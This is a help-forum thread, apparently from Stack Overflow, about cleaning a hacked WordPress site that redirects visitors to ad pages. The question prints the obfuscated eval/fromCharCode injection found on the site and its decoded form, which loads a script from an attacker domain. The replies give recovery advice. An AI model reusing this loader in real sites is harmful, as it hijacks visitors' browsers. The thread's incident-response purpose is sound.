# How to retrive hacked wordpress site

Tags: jquery, wordpress, malware

So basically my client's website is hacked, and every time I open, it redirects to another sites (Mostly Ads).

Its Behavior, Every time I run the website, It will automatically change home url and site url.

I tried, I changed home url and site url in cpanel but again I run the site it redirects. and after that it automatically changed to that address in cpanel also.

[image]

I am able to access backend after changing url in cpanel until run the frontend. I run a scan with Sucuri plugin it gives me error message below,

`11: 1569826918_2:"Error: admin, 122.160.112.18; General settings changed: (multiple entries): siteurl: from 'https:\/\/foo.com' to 'https:\/\/bes.belaterbewasthere.com\/reserv\/\/t3.js?',home: from 'https:\/\/foo.com' to 'https:\/\/bes.belaterbewasthere.com\/reserv\/\/a3.js?'"`

> Site address changed for privacy reason. Redirect url is there.

I check every possible files but can't find any suspicious code. Can anyone please help me.

Edit:
After few hours of research I figured out that this injected from a encrypted code below,
`eval(String.fromCharCode(32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,101,108,101,109,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,9,101,108,101,109,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,32,10,32,32,32,32,101,108,101,109,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,98,101,115,46,98,101,108,97,116,101,114,98,101,119,97,115,116,104,101,114,101,46,99,111,109,47,99,111,114,110,47,102,108,101,120,46,106,115,63,116,112,61,55,57,57,39,59,10,32,32,32,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,101,108,101,109,41,59,10,32,32,125,41,40,41,59));`

When I Decrypted this code(from this site `https://malwaredecoder.com/` ), I get this,

`eval( (function() {
 var elem = document.createElement('script'); 
 elem.type = 'text/javascript'; 
 elem.src = 'https://bes.belaterbewasthere.com/corn/flex.js?tp=799';
 document.getElementsByTagName("head")[0].appendChild(elem);
})(););`

Yes! that's the url `https://bes.belaterbewasthere.com` redirected and throws ad.

Comment: You can change the password of cpanel,ftp and mysql server and then check the file  and folder permission

Comment: Did you check the database? Most probably this malware was injected into the database.

Comment: Found this: https://blog.attacker.net/tag/wordpress-plugin-vulnerability

Comment: Do you have backups of the code and database? Restore one at a time locally so you can figure out if the problem is in the database or codebase.

Comment: @Jiniesh still same.

Comment: And @Rumplin Checked, there is only that redirected url, But something I get, Please wait for my update.

Comment: Please check my edit, Anyone can help. I'm in serious trouble :(

Comment: I would suggest to load a backup (files and database) and overwrite everything. I hope you have backups. Then run all the updates on the site that are available. Cleaning this manually out of the database and all the files will be really hard work.

Comment: @Rumplin Thanks for your suggestion. But I can't. Because site is running Wordpress version 4.6 and client was not so active to update it. He contact us after years. So I fear that site functionality will broke once I update anything.

Answer (score 1):

I had the same problem two days ago and had my issue fixed by overwritng the full database with a two weeks old one when the code wasn't there yet. 
The code was in a table used by Rich Reviews, where it was injected. That plugin is known for this issue and is removed from Wordpress because of it. 
After removing the plugin also, I was in contact with Google adwords, and they checked if everything was fine now, and it was and they restarted the adwords campaign.

If you don't have an backup, you might try if just deleting the plugin (maybe it is also Rich Reviews) associated with the table where the code is) to solve the issue. The table I had with this issue was rr_options.